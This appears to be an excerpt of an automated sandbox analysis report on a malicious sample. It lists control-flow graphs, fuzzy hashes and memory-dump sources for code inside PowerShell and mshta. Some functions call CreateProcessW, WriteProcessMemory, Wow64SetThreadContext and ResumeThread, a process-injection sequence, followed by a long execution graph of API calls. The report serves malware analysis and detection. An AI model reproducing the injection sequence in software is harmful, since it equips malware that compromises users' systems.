                                                        • Instruction ID: b9e3c5ea7d233efd28f2f4bca6cf9321e92a695f74aed775d7596ab78a64153d
                                                        • Opcode Fuzzy Hash: c9617e4c57d6181de3cc8a4e85977b9453593b45eae6a95bb6859bba1193e290
                                                        • Instruction Fuzzy Hash: BB72F420A1DBCA0FE757A73858642B57FE1EF87254F1901EBD08ECB1A3DA18AC59C351

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 150 7fe89aa3219-7fe89aa322f 151 7fe89aa3249-7fe89aa324f 150->151 152 7fe89aa3231-7fe89aa323f 150->152 154 7fe89aa334e-7fe89aa3358 151->154 155 7fe89aa3255-7fe89aa3258 151->155 152->151 153 7fe89aa3241-7fe89aa3247 152->153 153->151 156 7fe89aa336b-7fe89aa337b 154->156 157 7fe89aa335a-7fe89aa336a 154->157 158 7fe89aa325a-7fe89aa326d 155->158 159 7fe89aa32a1 155->159 161 7fe89aa3388-7fe89aa33b6 156->161 162 7fe89aa337d-7fe89aa3381 156->162 168 7fe89aa33b9-7fe89aa343b 158->168 169 7fe89aa3273-7fe89aa327d 158->169 160 7fe89aa32a3-7fe89aa32a5 159->160 160->154 164 7fe89aa32ab-7fe89aa32ae 160->164 161->168 162->161 164->154 166 7fe89aa32b4-7fe89aa32b7 164->166 166->154 170 7fe89aa32bd-7fe89aa32fb 166->170 188 7fe89aa343d-7fe89aa3461 168->188 171 7fe89aa3296-7fe89aa329f 169->171 172 7fe89aa327f-7fe89aa328c 169->172 170->154 180 7fe89aa32fd-7fe89aa3303 170->180 171->160 172->171 174 7fe89aa328e-7fe89aa3294 172->174 174->171 181 7fe89aa3305-7fe89aa3312 180->181 182 7fe89aa3322-7fe89aa3338 180->182 181->182 184 7fe89aa3314-7fe89aa3320 181->184 185 7fe89aa333e-7fe89aa334d 182->185 184->182 191 7fe89aa346d-7fe89aa3479 188->191 192 7fe89aa3463-7fe89aa3469 188->192 193 7fe89aa347b-7fe89aa3481 191->193 194 7fe89aa3485-7fe89aa34a1 191->194 192->191 193->194 194->188 195 7fe89aa34a3-7fe89aa34b4 194->195 196 7fe89aa34e7-7fe89aa3502 195->196 197 7fe89aa34b6-7fe89aa34e6 195->197 198 7fe89aa354c-7fe89aa3551 196->198 199 7fe89aa3504-7fe89aa3531 196->199 197->196 202 7fe89aa355b-7fe89aa3560 198->202 203 7fe89aa3553-7fe89aa3559 198->203 200 7fe89aa3537-7fe89aa3541 199->200 201 7fe89aa3773-7fe89aa378b 199->201 200->202 204 7fe89aa3543-7fe89aa354b 200->204 213 7fe89aa378d-7fe89aa37d3 201->213 214 7fe89aa37d5-7fe89aa3827 201->214 205 7fe89aa3566-7fe89aa3569 202->205 206 7fe89aa3702-7fe89aa370c 202->206 203->202 204->198 211 7fe89aa356b-7fe89aa357e 205->211 212 7fe89aa3580 205->212 208 7fe89aa371f-7fe89aa372f 206->208 
209 7fe89aa370e 206->209 216 7fe89aa373c 208->216 217 7fe89aa3731-7fe89aa3735 208->217 215 7fe89aa370f-7fe89aa371e 209->215 218 7fe89aa3582-7fe89aa3584 211->218 212->218 213->214 235 7fe89aa3829-7fe89aa3831 214->235 236 7fe89aa3832-7fe89aa38a5 214->236 220 7fe89aa373d-7fe89aa3772 216->220 217->216 218->206 219 7fe89aa358a-7fe89aa35be 218->219 230 7fe89aa35c0-7fe89aa35d3 219->230 231 7fe89aa35d5 219->231 232 7fe89aa35d7-7fe89aa35d9 230->232 231->232 232->206 234 7fe89aa35df-7fe89aa35e2 232->234 234->206 237 7fe89aa35e8-7fe89aa35eb 234->237 235->236 238 7fe89aa35ed-7fe89aa3600 237->238 239 7fe89aa3602 237->239 240 7fe89aa3604-7fe89aa3606 238->240 239->240 240->206 241 7fe89aa360c-7fe89aa360f 240->241 241->206 242 7fe89aa3615-7fe89aa364f 241->242 245 7fe89aa3668-7fe89aa3675 242->245 246 7fe89aa3651-7fe89aa365e 242->246 248 7fe89aa3689-7fe89aa368f 245->248 249 7fe89aa3677-7fe89aa3682 245->249 246->245 247 7fe89aa3660-7fe89aa3666 246->247 247->245 250 7fe89aa3691-7fe89aa3693 248->250 251 7fe89aa3700-7fe89aa3701 248->251 249->248 250->215 253 7fe89aa3695 250->253 254 7fe89aa3697-7fe89aa36ae 253->254 255 7fe89aa36dc-7fe89aa36dd 253->255 256 7fe89aa36df-7fe89aa36e7 254->256 257 7fe89aa36b0-7fe89aa36d8 254->257 255->220 255->256 258 7fe89aa36e9 256->258 259 7fe89aa36eb-7fe89aa36f0 256->259 257->255 260 7fe89aa36f1-7fe89aa36ff 258->260 259->260 260->251
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UA$(UA$(UA$P*B
                                                        • API String ID: 0-1137719822
                                                        • Opcode ID: e9947343767892b9e7834f6cef7a7f072bed02b8f0e5cfebbf00d34a08c8aad1
                                                        • Instruction ID: 97b38e2516b46b321842a1c0f29ddbfdaf8ca644ba0f4e368429829e15bf3f5f
                                                        • Opcode Fuzzy Hash: e9947343767892b9e7834f6cef7a7f072bed02b8f0e5cfebbf00d34a08c8aad1
                                                        • Instruction Fuzzy Hash: A432053090DBCA0FE75AA72858552B97FE1EF47654F1901EFD08ECB1A3DA14AC16C352

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 262 7fe899d6a15-7fe899d6adf 265 7fe899d6afb-7fe899d6b0b 262->265 266 7fe899d6ae1-7fe899d6af8 262->266 267 7fe899d6b0d-7fe899d6b24 265->267 268 7fe899d6b27-7fe899d6b7a 265->268 266->265 267->268 269 7fe899d6b7c-7fe899d6b9c 268->269 270 7fe899d6ba2-7fe899d6cce CreateProcessW 268->270 269->270 274 7fe899d6cd6-7fe899d6dc4 call 7fe899d6dc5 270->274 275 7fe899d6cd0 270->275 275->274
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 6fbb493ebca9c2ebc7febf9aeef3ac203d3126e6a608d17a9c511be9fb9b8564
                                                        • Instruction ID: c520a3553d0faae5ec02d8e15920356abc44fa4ee08ce24f121291532a3fd93c
                                                        • Opcode Fuzzy Hash: 6fbb493ebca9c2ebc7febf9aeef3ac203d3126e6a608d17a9c511be9fb9b8564
                                                        • Instruction Fuzzy Hash: 1EC11870908A5D8FDB99DF18C894BE9BBF1FB59311F0001AAD04EE3261DB75AA84CF40

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 286 7fe899d5378-7fe899d6adf 289 7fe899d6afb-7fe899d6b0b 286->289 290 7fe899d6ae1-7fe899d6af8 286->290 291 7fe899d6b0d-7fe899d6b24 289->291 292 7fe899d6b27-7fe899d6b7a 289->292 290->289 291->292 293 7fe899d6b7c-7fe899d6b9c 292->293 294 7fe899d6ba2-7fe899d6cce CreateProcessW 292->294 293->294 298 7fe899d6cd6-7fe899d6dc4 call 7fe899d6dc5 294->298 299 7fe899d6cd0 294->299 299->298
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 7b20864257b386df1ad63a1835cb39b32f76f6c3a876812bf44790b78397a9ac
                                                        • Instruction ID: 10be96e03f96c47c0324021103c8d25f5b03352fb7a19909bb5468575b1a710f
                                                        • Opcode Fuzzy Hash: 7b20864257b386df1ad63a1835cb39b32f76f6c3a876812bf44790b78397a9ac
                                                        • Instruction Fuzzy Hash: 6DC10870908A5D8FDB99DF18C894BE9B7F1FB69301F1011AE944EE3661DB75AA80CF40

                                                        Control-flow Graph (function starting at 7fe899d734d; calls WriteProcessMemory)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 5145e7dcc5bc3b7f1e34cc7633ac2b14b5ca72a36acba251236869e2915b88f5
                                                        • Instruction ID: 7672693f39c25a4daa88a193a29278f5370c751fde8a5befc1042e9189a6f785
                                                        • Opcode Fuzzy Hash: 5145e7dcc5bc3b7f1e34cc7633ac2b14b5ca72a36acba251236869e2915b88f5
                                                        • Instruction Fuzzy Hash: EB611470908A5D8FDB99DF58C884BE9BBF1FB69314F1041AED04DE3291DB74A985CB40

                                                        Control-flow Graph (function starting at 7fe899d53d8; calls WriteProcessMemory)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 49a8b648e4dcf35616d789b82985ccc1a0849b0d8b1d96c75535577ceb547c97
                                                        • Instruction ID: 57b3febb8af978b15b2370312f5c81ab4dc3c21e53eb2d6fca33343f9ccc81d0
                                                        • Opcode Fuzzy Hash: 49a8b648e4dcf35616d789b82985ccc1a0849b0d8b1d96c75535577ceb547c97
                                                        • Instruction Fuzzy Hash: 4E51E170908A5C8FDB98DF98C884BE9BBF1FB69314F1051AE904EE3251DB74A985CF44

                                                        Control-flow Graph (function starting at 7fe899d6e49; calls Wow64SetThreadContext)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 0ac4719184552d51afcba550e27ee72584b3212c9fb7666c3e588179af1341b1
                                                        • Instruction ID: bbef150f0726723abc18cec4cab8d633f70156fb1688922384debaf94a264dd1
                                                        • Opcode Fuzzy Hash: 0ac4719184552d51afcba550e27ee72584b3212c9fb7666c3e588179af1341b1
                                                        • Instruction Fuzzy Hash: 7E517D70D08A8D8FDB55DF98C884BE9BBF1FB66310F10829AD048D7266D774A885CF40

                                                        Control-flow Graph (function starting at 7fe899d5398; calls Wow64SetThreadContext)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: cbfba70240b16eeef935c5f61ed5cd181ce391d7a63bd38287cce97d453041cb
                                                        • Instruction ID: 5cbc83c0a3fcfda46642dc33c59e0e9ae33cf0c7f81cb205e9f50d8ec88718eb
                                                        • Opcode Fuzzy Hash: cbfba70240b16eeef935c5f61ed5cd181ce391d7a63bd38287cce97d453041cb
                                                        • Instruction Fuzzy Hash: 72512A70D08A4D8FDB94DF98C484BE9BBF1FB69311F10826AD009D3255D774A885CF80

                                                        Control-flow Graph (function starting at 7fe899d53b8; calls Wow64SetThreadContext)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 7bada5b66b3fd3b9a059000b75aa72516db12068d10f1fe1b6159b324ee13983
                                                        • Instruction ID: b14e554afe4a313d31b3408b50607d8a9350a51e8e94f5d8b60df6bc8e58c988
                                                        • Opcode Fuzzy Hash: 7bada5b66b3fd3b9a059000b75aa72516db12068d10f1fe1b6159b324ee13983
                                                        • Instruction Fuzzy Hash: 2A511A70D08A4D8FDB94DF99C484BE9BBF1FB69311F10826AD009D7255D774A985CF80

                                                        Control-flow Graph (function starting at 7fe899d7539; calls ResumeThread)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 341329d9a141ffd082f0984f96ef9b8b1d9b53c2a820313da2a2c769be827f72
                                                        • Instruction ID: e5c5233f92c15c63cfe005d6761da13f0cfbe8f613b510ed43610d09b4e7caa7
                                                        • Opcode Fuzzy Hash: 341329d9a141ffd082f0984f96ef9b8b1d9b53c2a820313da2a2c769be827f72
                                                        • Instruction Fuzzy Hash: 96412A70D0874C8FDB59DF98D885BADBBB0EB5A310F14419ED049E72A2DA70A886CF51

                                                        Control-flow Graph (function starting at 7fe899d5408; calls ResumeThread)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 5220bb602f19a5b721ed5dc67172246ba846147b0f826be3428eb1629da4f949
                                                        • Instruction ID: 70d19f92f533d174ac9f45398d6c23d26c5a58be199f89ae03b782b80440e912
                                                        • Opcode Fuzzy Hash: 5220bb602f19a5b721ed5dc67172246ba846147b0f826be3428eb1629da4f949
                                                        • Instruction Fuzzy Hash: D041F970E08A4C8FDB98DF98D885BADBBF0FB5A310F10515ED049E7251DA70A846CF51

                                                        Control-flow Graph (function starting at 7fe89aa2a8a)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r68
                                                        • API String ID: 0-2565176026
                                                        • Opcode ID: b25f1933e2bbd7490abd8706cff9269624ae3acf0fec4f5a283a035f77528e4c
                                                        • Instruction ID: 8cb8a5bba4207002e09aa8bde475e9597c9cd0dd4525bc23deffe1bc80cc0490
                                                        • Opcode Fuzzy Hash: b25f1933e2bbd7490abd8706cff9269624ae3acf0fec4f5a283a035f77528e4c
                                                        • Instruction Fuzzy Hash: 96210531F0DA994FEBA5A72C68157F8B7D2EF59250F1802E7C44EC71A6DA18AC618390

                                                        Control-flow Graph (function starting at 7fe89aa2ab1)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r68
                                                        • API String ID: 0-2565176026
                                                        • Opcode ID: f1271f810f373b187209e0acc951a9bc91442d10a466bd094d60d1648933966d
                                                        • Instruction ID: dc6f544ead2c210b09169f1e6633b11755e2ac768767c9344db7b63225214638
                                                        • Opcode Fuzzy Hash: f1271f810f373b187209e0acc951a9bc91442d10a466bd094d60d1648933966d
                                                        • Instruction Fuzzy Hash: 41F0AE31E1D99D0FF7A5A33C24152F47AD1EF55150F1501E6C49ED7263D9145C658380

                                                        Control-flow Graph (function starting at 7fe89aa2444)
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80cd96888e2334b9aa23b3b3297820eec0f5fcac9ba23a6d339a8b494ff337e6
                                                        • Instruction ID: 80216e422f783361d75058fb20aa28e76ddd420afd7efb5f4df071c3862ba621
                                                        • Opcode Fuzzy Hash: 80cd96888e2334b9aa23b3b3297820eec0f5fcac9ba23a6d339a8b494ff337e6
                                                        • Instruction Fuzzy Hash: 52515B31E2DB874FE75A932C58607B87BD1FF45654F2811FEC88EC71A2D624AC618340
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.449696587.0000000003400000.00000010.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_3400000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9cdd50c2bbb88692d56e9e0c74983d66fa45a57c97d4bc18964ac6f8475e1817
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:

                                                        Execution Graph

                                                        Execution Coverage: 1.7%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 3.5%
                                                        Total number of Nodes: 716
                                                        Total number of Limit Nodes: 12
438e14 47287->47316 47289 43a476 47290 43a481 47289->47290 47321 438ec2 6 API calls try_get_function 47289->47321 47290->47274 47292 43a48f 47293 43a49c 47292->47293 47322 43a49f 6 API calls ___vcrt_FlsFree 47292->47322 47293->47274 47295->47272 47302 438cf3 47296->47302 47299 438f36 InitializeCriticalSectionAndSpinCount 47300 438f22 47299->47300 47300->47282 47301->47286 47303 438d23 47302->47303 47304 438d27 47302->47304 47303->47304 47308 438d47 47303->47308 47309 438d93 47303->47309 47304->47299 47304->47300 47306 438d53 GetProcAddress 47307 438d63 __crt_fast_encode_pointer 47306->47307 47307->47304 47308->47304 47308->47306 47310 438dbb LoadLibraryExW 47309->47310 47315 438db0 47309->47315 47311 438dd7 GetLastError 47310->47311 47314 438def 47310->47314 47312 438de2 LoadLibraryExW 47311->47312 47311->47314 47312->47314 47313 438e06 FreeLibrary 47313->47315 47314->47313 47314->47315 47315->47303 47317 438cf3 try_get_function 5 API calls 47316->47317 47318 438e2e 47317->47318 47319 438e46 TlsAlloc 47318->47319 47320 438e37 47318->47320 47320->47289 47321->47292 47322->47290 47326 44fc01 47323->47326 47324 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47325 43464e 47324->47325 47325->46969 47325->47280 47326->47324 47328 434bb8 GetStartupInfoW 47327->47328 47328->46982 47330 44f0e2 47329->47330 47332 44f0eb 47329->47332 47334 44efd8 47330->47334 47332->46985 47333->46985 47354 448295 GetLastError 47334->47354 47336 44efe5 47375 44f0f7 47336->47375 47338 44efed 47384 44ed6c 47338->47384 47341 44f004 47341->47332 47344 44f047 47409 446802 20 API calls __dosmaperr 47344->47409 47348 44f042 47408 44062d 20 API calls __dosmaperr 47348->47408 47350 44f08b 47350->47344 47411 44ec42 20 API calls 47350->47411 47351 44f05f 47351->47350 47410 446802 20 API calls __dosmaperr 47351->47410 47355 4482b7 47354->47355 47356 4482ab 47354->47356 47413 445b74 20 API calls 3 library calls 47355->47413 47412 44883c 11 API calls 2 library calls 47356->47412 47359 4482b1 
47359->47355 47361 448300 SetLastError 47359->47361 47360 4482c3 47366 4482cb 47360->47366 47415 448892 11 API calls 2 library calls 47360->47415 47361->47336 47364 4482e0 47364->47366 47367 4482e7 47364->47367 47365 4482d1 47368 44830c SetLastError 47365->47368 47414 446802 20 API calls __dosmaperr 47366->47414 47416 448107 20 API calls __dosmaperr 47367->47416 47418 446175 35 API calls _abort 47368->47418 47371 4482f2 47417 446802 20 API calls __dosmaperr 47371->47417 47374 4482f9 47374->47361 47374->47368 47376 44f103 CallCatchBlock 47375->47376 47377 448295 _abort 35 API calls 47376->47377 47379 44f10d 47377->47379 47380 44f191 CallCatchBlock 47379->47380 47419 446175 35 API calls _abort 47379->47419 47420 445909 EnterCriticalSection 47379->47420 47421 446802 20 API calls __dosmaperr 47379->47421 47422 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 47379->47422 47380->47338 47423 43a837 47384->47423 47387 44ed8d GetOEMCP 47389 44edb6 47387->47389 47388 44ed9f 47388->47389 47390 44eda4 GetACP 47388->47390 47389->47341 47391 4461b8 47389->47391 47390->47389 47392 4461f6 47391->47392 47397 4461c6 __Getctype 47391->47397 47434 44062d 20 API calls __dosmaperr 47392->47434 47394 4461e1 RtlAllocateHeap 47395 4461f4 47394->47395 47394->47397 47395->47344 47398 44f199 47395->47398 47397->47392 47397->47394 47433 443001 7 API calls 2 library calls 47397->47433 47399 44ed6c 37 API calls 47398->47399 47400 44f1b8 47399->47400 47403 44f209 IsValidCodePage 47400->47403 47405 44f1bf 47400->47405 47407 44f22e ___scrt_fastfail 47400->47407 47401 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47402 44f03a 47401->47402 47402->47348 47402->47351 47404 44f21b GetCPInfo 47403->47404 47403->47405 47404->47405 47404->47407 47405->47401 47435 44ee44 GetCPInfo 47407->47435 47408->47344 47409->47341 47410->47350 47411->47344 47412->47359 47413->47360 47414->47365 47415->47364 47416->47371 47417->47374 47420->47379 47421->47379 47422->47379 47424 43a854 47423->47424 
47425 43a84a 47423->47425 47424->47425 47426 448295 _abort 35 API calls 47424->47426 47425->47387 47425->47388 47427 43a875 47426->47427 47431 4483e4 35 API calls __Toupper 47427->47431 47429 43a88e 47432 448411 35 API calls __cftof 47429->47432 47431->47429 47432->47425 47433->47397 47434->47395 47439 44ee7e 47435->47439 47444 44ef28 47435->47444 47438 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47441 44efd4 47438->47441 47445 4511ac 47439->47445 47441->47405 47443 44aee6 _swprintf 40 API calls 47443->47444 47444->47438 47446 43a837 __cftof 35 API calls 47445->47446 47447 4511cc MultiByteToWideChar 47446->47447 47449 45120a 47447->47449 47457 4512a2 47447->47457 47451 45122b __alloca_probe_16 ___scrt_fastfail 47449->47451 47452 4461b8 ___crtLCMapStringA 21 API calls 47449->47452 47450 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47453 44eedf 47450->47453 47454 45129c 47451->47454 47456 451270 MultiByteToWideChar 47451->47456 47452->47451 47459 44aee6 47453->47459 47464 435ecd 20 API calls _free 47454->47464 47456->47454 47458 45128c GetStringTypeW 47456->47458 47457->47450 47458->47454 47460 43a837 __cftof 35 API calls 47459->47460 47461 44aef9 47460->47461 47465 44acc9 47461->47465 47464->47457 47466 44ace4 ___crtLCMapStringA 47465->47466 47467 44ad0a MultiByteToWideChar 47466->47467 47468 44ad34 47467->47468 47478 44aebe 47467->47478 47469 44ad55 __alloca_probe_16 47468->47469 47473 4461b8 ___crtLCMapStringA 21 API calls 47468->47473 47472 44ad9e MultiByteToWideChar 47469->47472 47487 44ae0a 47469->47487 47470 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47471 44aed1 47470->47471 47471->47443 47474 44adb7 47472->47474 47472->47487 47473->47469 47492 448c33 47474->47492 47478->47470 47479 44ade1 47482 448c33 _swprintf 11 API calls 47479->47482 47479->47487 47480 44ae19 47481 4461b8 ___crtLCMapStringA 21 API calls 47480->47481 47485 44ae3a __alloca_probe_16 47480->47485 47481->47485 47482->47487 47483 44aeaf 
47500 435ecd 20 API calls _free 47483->47500 47485->47483 47486 448c33 _swprintf 11 API calls 47485->47486 47488 44ae8e 47486->47488 47501 435ecd 20 API calls _free 47487->47501 47488->47483 47489 44ae9d WideCharToMultiByte 47488->47489 47489->47483 47490 44aedd 47489->47490 47502 435ecd 20 API calls _free 47490->47502 47493 44854a __dosmaperr 5 API calls 47492->47493 47494 448c5a 47493->47494 47498 448c63 47494->47498 47503 448cbb 10 API calls 3 library calls 47494->47503 47496 448ca3 LCMapStringW 47496->47498 47497 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47499 448cb5 47497->47499 47498->47497 47499->47479 47499->47480 47499->47487 47500->47487 47501->47478 47502->47487 47503->47496 47505 41cc20 LoadLibraryA GetProcAddress 47504->47505 47506 41cc10 GetModuleHandleA GetProcAddress 47504->47506 47507 41cc49 44 API calls 47505->47507 47508 41cc39 LoadLibraryA GetProcAddress 47505->47508 47506->47505 47507->46990 47508->47507 47686 41b539 FindResourceA 47509->47686 47513 40f428 ctype 47696 4020b7 47513->47696 47516 401fe2 28 API calls 47517 40f44e 47516->47517 47518 401fd8 11 API calls 47517->47518 47519 40f457 47518->47519 47520 43bda0 new 21 API calls 47519->47520 47521 40f468 ctype 47520->47521 47702 406e13 47521->47702 47523 40f49b 47523->46992 47525 40210c 47524->47525 47526 4023ce 11 API calls 47525->47526 47527 402126 47526->47527 47528 402569 28 API calls 47527->47528 47529 402134 47528->47529 47529->46995 47739 4020df 47530->47739 47532 41bebf 47536 41bf31 47532->47536 47543 401fe2 28 API calls 47532->47543 47547 401fd8 11 API calls 47532->47547 47551 41bf2f 47532->47551 47743 4041a2 28 API calls 47532->47743 47744 41cec5 47532->47744 47533 401fd8 11 API calls 47534 41bf61 47533->47534 47535 401fd8 11 API calls 47534->47535 47538 41bf69 47535->47538 47755 4041a2 28 API calls 47536->47755 47540 401fd8 11 API calls 47538->47540 47544 40ea5f 47540->47544 47541 41bf3d 47542 401fe2 28 API calls 47541->47542 47545 41bf46 47542->47545 
47543->47532 47552 40fb52 47544->47552 47546 401fd8 11 API calls 47545->47546 47548 41bf4e 47546->47548 47547->47532 47549 41cec5 28 API calls 47548->47549 47549->47551 47551->47533 47553 40fb5e 47552->47553 47555 40fb65 47552->47555 47781 402163 11 API calls 47553->47781 47555->47000 47557 402163 47556->47557 47561 40219f 47557->47561 47782 402730 11 API calls 47557->47782 47559 402184 47783 402712 11 API calls std::_Deallocate 47559->47783 47561->47002 47562->47007 47563->47012 47564->47015 47565->47020 47567 401ff1 47566->47567 47574 402039 47566->47574 47568 4023ce 11 API calls 47567->47568 47569 401ffa 47568->47569 47570 402015 47569->47570 47571 40203c 47569->47571 47784 403098 28 API calls 47570->47784 47785 40267a 11 API calls 47571->47785 47575 401fd8 47574->47575 47576 4023ce 11 API calls 47575->47576 47577 401fe1 47576->47577 47577->47027 47578->47031 47579->47033 47580->47035 47581->47037 47582->47044 47786 401fab 47583->47786 47585 40d0ae CreateMutexA GetLastError 47585->47049 47586->47008 47587->47010 47588->47016 47589->47019 47591->47041 47592->47054 47593->47057 47594->47045 47595->47055 47596->47065 47597->47074 47598->47067 47599->47081 47600->47058 47601->47064 47602->47073 47603->47079 47604->47082 47605->47087 47606->47092 47607->47096 47608->47102 47609->47104 47610->47106 47611->47114 47612->47119 47613->47124 47614->47131 47615->47135 47616->47139 47617->47112 47618->47118 47619->47123 47620->47128 47621->47136 47622->47140 47623->47144 47624->47151 47625->47155 47626->47160 47627->47164 47628->47125 47629->47129 47630->47137 47631->47145 47632->47147 47633->47150 47634->47156 47635->47159 47636->47163 47637->47167 47638->47169 47639->47171 47640->47173 47641->47175 47642->47177 47643->47179 47644->47181 47645->47183 47646->47186 47647->47188 47654 434563 47648->47654 47649 43bda0 new 21 API calls 47649->47654 47650 40f10c 47655 401e65 22 API calls 47650->47655 47654->47649 47654->47650 47787 443001 7 API calls 2 library calls 47654->47787 
